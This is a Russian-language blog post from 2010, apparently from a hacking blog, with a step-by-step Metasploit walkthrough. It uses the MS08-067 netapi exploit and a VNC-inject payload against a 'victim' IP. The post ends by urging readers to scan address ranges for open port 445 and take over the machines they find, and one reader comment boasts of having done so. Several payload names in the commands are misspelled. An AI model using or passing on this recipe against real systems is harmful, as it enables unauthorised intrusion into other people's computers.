samedi 30 janvier 2010

Простой пример.

В этой статье мы покажем на простом примере на что способен MSF. Для примера будем использовать MS08-067 netapi exploit. Также освоим основные команды.
Запускаем консоль :

Команда show exploits показывает все доступные эксплоиты. Как видите выбирать есть из чего. Имеются эксплоиты под разные платформы: Windows, Linux, IIS, Apach и т.д :

Сейчас мы опишем процедуру выбора определенного эксплоита и его запуска. Команда use [название эксплоита] активирует его рабочую среду. Мы будем использовать как пример MS08-067 netapi exploit.



Набираем : use windows/smb/ms08_067_netapi

Чтобы вернуться назад - используем команду back.
Чтобы узнать больше инфы об эксплоите - info.
Ну так значит, вот, мы и в рабочей среде эксплоита. Набираем show options чтьб увидеть какие условия необходимо выполнить:

Этот эксплоит твебует введения трех параметров : RHOST - IP адресс цели необходимо указать (остальные уже заполнены по умолчанию).
Набираем set RHOST [IP адресс жертвы] :

Команда show payloads выводит все начинки, которые можно использовать с данным эксплоитом.

Мы будем использовать начинку windos/vncinject/bind_tcp

Набираем set PAYLOAD windows/vcninject/bind_tcp

Если вы подозреваете, что на машине жертвы может стоять фаервол, тогда используем windows/vcninject/reverse_tcp.

Ну вот, все готово, теперь командуем exploit или run. Эта команда запускает выбранный и настроенный эксплоит против жертвы :

Ну вот и все - мы в компе у жертвы и можем делать все, что захотим... :)

Video [TuT] на инглише.

Уязвимость правда довольно старенькая, но тачки с ней еще встречаются, так что вперед сканим диапазоны на открытый 445 й порт. Удачи :)

$vz00r

2 commentaires:

  1. оо, таких я машин насканил немало:)

    RépondreSupprimer
  2. Взур, спасибо за статьи, вот только жаль что ты забросил блог :\

    RépondreSupprimer